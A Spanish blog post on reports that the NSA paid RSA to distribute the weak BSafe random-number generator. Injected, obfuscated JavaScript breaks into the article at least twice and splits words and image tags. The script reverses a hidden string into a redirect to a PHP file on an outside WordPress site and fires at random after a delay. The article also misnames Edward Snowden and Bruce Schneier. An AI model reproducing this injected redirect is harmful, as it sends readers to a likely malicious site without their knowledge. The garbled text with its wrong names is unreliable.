La NSA pagó 10 millones a RSA por distribuir un cifrado inseguro
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to.com/wp-content/uploads/2013/12/nsa_011.jpg” width=”600″ height=”588″ /></p>
<p>La empresa de seguridad RSA, especializada en sistemas de cifrado, recibió 10 millones de dólares de la agencia de seguridad estadounidense NSA como pago por publicar un sistema de cifrado que pudiesen romper con facilidad. Una serie de documen<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tos filtrados por Eric Snowden desvelaron el fallo de seguridad intencionado y ahora fuentes consultadas por la agencia de noticias Reuters aseguran que se pagó a la compañía por distribuir el software inseguro.
Según dichas fuentes, el fallo de seguridad fue creado de forma deliberada por la NSA, que publicó un sistema de generación de números pseudoaleatorios –una de las piezas fundamentales de los sistemas de cifrado– que les permite saltarse los sistemas de seguridad basados en él. Posteriormente, RSA utilizó dicho sistema en una herramienta de cifrado llamada BSafe.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to.com/wp-content/uploads/2013/12/rsa_01.jpg” width=”600″ height=”367″ /><br />
Este software, que se apoya en el algoritmo creado por NSA, genera números alea<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
torios en la mayor parte de las ocasiones, pero intercala entre ellos una serie de cifras predeterminadas que permiten a un atacante que las conozca romper cualquier información cifrada con BSafe. Por la naturaleza del fallo, en principio no parece que nadie fuera de la agencia de seguridad haya podido romper el cifrado con facilidad. Sin embargo, que toda la seguridad de un sistema de cifrado se base en conocer una secuencia de números concreta no está lejos del alcance de los analistas especializados.
La herramienta se integra en desarrollos de software para ofrecer cifrado seguro. Según la web de RSA, BSafe se utiliza en miles de programas. La cifra exacta es desconocida, pero es muy probable que se trate tanto de programas comerciales como de desarrollos ad hoc para empresas que han utilizado BSafe para disponer de un sistema que asegure sus datos y comunicaciones. Sin embargo, el gobierno estadounidense podía acceder a dichos datos.
La reacción de RSA ante el fallo de seguridad, revelado en septiembre en los documentos filtrados por Eric Snowden, consistió en solicitar a los usuarios que dejasen de utilizar la fórmula creada por la NSA por no ser segura. Una advertencia que parecía legítima, en especial por provenir de una compañía fundada por profesores del MIT, con una larga trayectoria de defender posturas favorables a la privacidad de los usuarios, en ocasiones enfrentada a las posiciones del gobierno de EEUU.
RSA y su compañía matriz, EMC, han asegurado que “RSA siempre actúa en el mejor interés de sus clientes y bajo ninguna circunstancia diseña o habilita ninguna puerta trasera [backdoor] en sus productos. Las decisiones sobre las características y funciones de los productos de RSA son nuestras”. Precisamente de puerta trasera calificó el fallo de seguridad Bruce Scheiner, una de las grandes autoridades en materia de cifrado y editor del boletín de seguridad Crypto-gram. La NSA no ha ofrecido ningún tipo de explicación.
__________
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Siguenos
en facebook
Los comentarios están cerrados.